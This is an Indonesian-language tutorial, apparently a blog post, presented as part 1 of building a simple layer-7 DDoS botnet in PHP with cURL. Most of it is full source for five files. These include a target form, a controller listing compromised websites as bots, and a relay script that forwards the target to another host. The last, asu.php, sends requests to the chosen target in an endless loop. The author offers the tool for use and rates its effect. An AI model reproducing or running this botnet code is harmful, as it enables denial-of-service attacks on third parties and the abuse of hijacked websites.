Membuat botnet sederhana dengan php(CURL) pt 1

 

Cara membuat botnet menggunakan file php dan html ada 5 file yang dibutuhkan ini adalah botnet untuk melakukan penolakan layanan di layer 7 yaitu layer aplikasi 5 file itu sebagai berikut yaitu 3 file dijalankan di localhost 2 file di upload ke website yang akan kita jadikan botnet

localhost:

- halo.html [untuk memasukkan target]

- jembud.php [menerima input dari halo.html dan menampilkan bot dengan target]

- open.php [untuk membuka seluruh url bot agar seluruh url tersebut berjalan]

botnet:

- post.php [menerima permintaan get lalu mengirimkan permintaan post ke asu.php]

- asu.php [menerima permintaan post dan melakukan request secara terus menerus ke data yang dikirim]

script:

- halo.html

<form method="POST" action="jembud.php">
    Target: <input type="text" name="bot">
    <input type="submit" value="Send" >
</form>

 

- jembud.php

<?php
$terima = $_POST["bot"];
// isi dengan botnet misal contoh saya punya 5 website yang terinfeksi
$isi = ["website.com/post.php?u=" , "botnet.com/post.php?u=", "website1.com/post.php?u=" , "website2.com/post.php?u=" , "website.com3/post.php?u="];
echo "website:","<br>";
for ($i = 0; $i <= count($isi); $i++ ) {
    echo "$isi[$i]$terima<br>";
}
echo "<br><br>copy:<br>";
for ($i = 0; $i <= count($isi); $i++ ) {
    echo "myWindow$i = window.open('$isi[$i]$terima', '_blank');<br>";
}
echo "<br>close:<br>";
for ($i = 0; $i <= count($isi); $i++ ) {
    echo "myWindow$i.close();<br>";
}
?>

- open.php

<script>
var myWindow;

function openWin() {
  myWindow1 = window.open('https://localhost/botnet/asu.php?u=https://enj52j28rmy29o4.m.pipedream.net', '_blank');
  myWindow2 = window.open('https://localhost/botnet/asu.php?u=https://enj52j28rmy29o4.m.pipedream.net', '_blank');
}

function closeWin() {
  myWindow1.close();
  myWindow2.close();
}
</script>
<script>openWin()</script>


<?php 
sleep(3);
echo "<script>closeWin()</script>";
?>

- post.php

<?php
$terima = $_GET['u'];
$bot = "lololhah.ueuo.com/asu.php" ;

$curlHandle = curl_init();
curl_setopt($curlHandle, CURLOPT_URL, $bot);
curl_setopt($curlHandle, CURLOPT_POSTFIELDS, "website=$terima");
curl_setopt($curlHandle, CURLOPT_HEADER, 0);
curl_setopt($curlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curlHandle, CURLOPT_TIMEOUT,30);
curl_setopt($curlHandle, CURLOPT_POST, 1);
curl_exec($curlHandle);
?>

- asu.php

<?php
$satu = $_POST["website"];
// ddos

$ch = curl_init();

for ($jancok = 0; $jancok <= 1;) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $satu);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $output = curl_exec($ch);
    curl_close($ch);
    echo " melakukan request kepada ",$satu, " sebanyak ",$jancok," kali <br>";
}
?>

 

 

Cara penggunaan: ribet

Efek 1 bot terhadap target: kecil

Minimal bot untuk down: -

Bypass seluruh pertahanan: tidak